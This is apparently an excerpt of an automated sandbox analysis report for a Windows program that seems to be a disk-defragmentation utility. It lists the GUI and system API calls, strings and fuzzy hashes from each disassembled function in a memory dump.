                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 8F$C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2359154852-3356063517
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1290606431-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1863454828-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3220701275-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction ID: 1850dbf4910a2f6436d9a8060cce1c0b3c7b383cd418d825aeeea627d68539a0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79213AB5604601AFC714DF68D985F6AB7E8FB8C710F008A2DF459C3690DB74E8448B95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                    • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                    • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 0040122D
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422F48
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                    • Opcode ID: 59c7556ff35f631bf204cef4fa8707c16d05c0d1fb6d4562dda13db1bf437196
                                                                                                                                                                                                                                                                                    • Instruction ID: fed9d3ca3bfe53db5501e1f63bebbc1333baccd255b2eb749adb8bf470123f53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59c7556ff35f631bf204cef4fa8707c16d05c0d1fb6d4562dda13db1bf437196
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E151A43170061AABC31CEF6CD995AA9F3A1BB84300F85862EED158B781D7B4B951DBC4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                    • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                    • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                    • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                     • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\Setting Option\Exclude$`=
                                                                                                                                                                                                                                                                                    • API String ID: 0-3794877113
                                                                                                                                                                                                                                                                                    • Opcode ID: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b5e8dd470563cbc387b5fcd8bef698c16006e04536aa332a21aa0bb045417de
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041A371504245AFD304EF55CD85EABBBF8FF88348F00092EF95A82250EB75E944CBA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemPowerStatus.KERNEL32 ref: 00423907
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 004239E8
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(BB40E64E,00000000), ref: 00423A15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongNamePath$PowerStatusSystem
                                                                                                                                                                                                                                                                                    • String ID: 3400003
                                                                                                                                                                                                                                                                                    • API String ID: 2229323602-2398869336
                                                                                                                                                                                                                                                                                    • Opcode ID: 057325de7599dd7353c85ea60434a88cbbf49cf5f83a7ab393cd0de2b9172bd1
                                                                                                                                                                                                                                                                                    • Instruction ID: 559a5a5f11ad9cbb26b2ef481da3000354db79d5173c1cf665cce4c119cf32f6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 057325de7599dd7353c85ea60434a88cbbf49cf5f83a7ab393cd0de2b9172bd1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51C6712083419FD310EF20DD85BABB7F8AF88715F50092EF199921D1DB78AA49CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422C04
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                    • Opcode ID: d5e77d074dc722500c1b88aee6bf059e24061e9123afcca7327058d6b3c785ee
                                                                                                                                                                                                                                                                                    • Instruction ID: 0b9e0d0bd62f39a9103a5831cbb30b95e2098115bf74eedd830be0e4041926e5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e77d074dc722500c1b88aee6bf059e24061e9123afcca7327058d6b3c785ee
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 644196313007059FC728EE2DDD85BAAB7E1BF84304F94852EED468F385DAB4B845C654
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00430FF8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
